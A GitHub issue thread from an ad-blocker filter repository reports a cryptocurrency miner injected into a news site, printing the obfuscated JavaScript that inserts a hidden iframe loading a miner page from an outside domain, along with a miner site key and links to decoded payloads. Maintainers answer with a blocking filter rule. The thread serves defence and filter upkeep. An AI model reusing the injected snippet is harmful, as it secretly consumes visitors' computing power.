### ISSUE TITLE
Crypto Miner on www.123telugu.com

### ISSUE THREAD

**Issue by fuzzykiller** [uBlockOrigin/uAssets#1698]
### URL(s) where the issue occurs

`http://www.123telugu.com/`

### Describe the issue

This site starts a crypto currency miner via `https://s3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js`:

```js
var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);
```

This script isn’t listed as either blacklisted or whitelisted by uBlock Origin’s logger.

### Screenshot(s)

Screenshot of downloaded files resulting from this code:

![network inspector](http://upload.gekl4ut.de/s/ccminer.bd33f0eb0aa8e16cd7af252cbc0255204fe10ef0.png)

### Versions

- Browser/version: Firefox 58.0.2 / Chrome 65.0.3325.146
- uBlock Origin version: v1.15.10 (on Firefox) / v1.15.2 (Chrome)

### Settings

Enable “Advanced user”, activate various blocking lists, add various custom filters and rules. Nothing that should make any difference, really.

### Notes

I tried to identify the ad network apparently compromised (`23ap.com`). However, I wasn’t able to find a website that looks legitimate enough to make it worth reporting the issue to them.

IMHO, at least the `datasecu.download` domain should be completely blocked. However, since that could easily be worked around by the bad guys, blocking the script hosted on S3 might be more appropriate.

**Comment by okiehsch** [comment]
`datasecu.download` is already blocked https://github.com/uBlockOrigin/uAssets/blob/master/filters/resource-abuse.txt#L350

I will add 
````
123telugu.com##script:inject(abort-on-property-read.js, _0x7bc7)
````
which will disable the mining code inside `3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js`
Blocking the whole script would also block `ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js`.

**Comment by fuzzykiller** [comment]
Thanks for the quick response! 👍 
Caching made me miss those new entries.

I’m not familiar at all with what uBlock Origin can do these days. Wouldn’t it be possible to somehow combined that `abort-on-property-read.js` with the script URL instead of the site URL?

**Comment by okiehsch** [comment]
No, `example.com##script:inject` allows the injection of javascript code into specific pages, so 
`amazonaws.com##script:inject(abort-on-property-read.js, _0x7bc7)` would only be injected if you go to
`amazonaws.com`, or a subdomain ;).

**Comment by SMed79** [comment]
@okiehsch check these sites
```
http://alejandraribera.com/
http://center-comptech.ru/
http://portaldaurologia.org.br/
https://almasiyan.com/
---
NSFW
http://gioitinh18.com/
```

**Comment by okiehsch** [comment]
They all use an embedded iframe
![unbenannt](https://user-images.githubusercontent.com/16838044/37252643-ff18ddfe-2524-11e8-8b09-801332b3040b.PNG)
which is blocked, I do not see what else can be added.

**Comment by SMed79** [comment]
I have a doubt that these sites has been hacked.

**Comment by SMed79** [comment]
googling... i find this [\_post\_](https://blog.manchestergreyhats.co.uk/posts/the-injected-coinhive-iframe---a-quick-look/) about `securedatas.download` which is a mirror of `datasecu.download`

**Comment by vastdevops** [comment]
One of our sites was compromised last night with the same problem. From what I can see our AWS CDN permissions were set to public by accident.  Coin Hive has been notified. I hope they do something about this user.
this._siteKey = "vVX7yB0wYaYNlHkhfs4q13ZX03vyDdWZ"

https://www.datasecu.download/lot.html
https://pastebin.com/zMZCDyWh

https://www.datasecu.download/c.js
https://pastebin.com/LSQQXBYE

https://www.datasecu.download/c.js Base64 DECODED
https://pastebin.com/9H6WBX7i
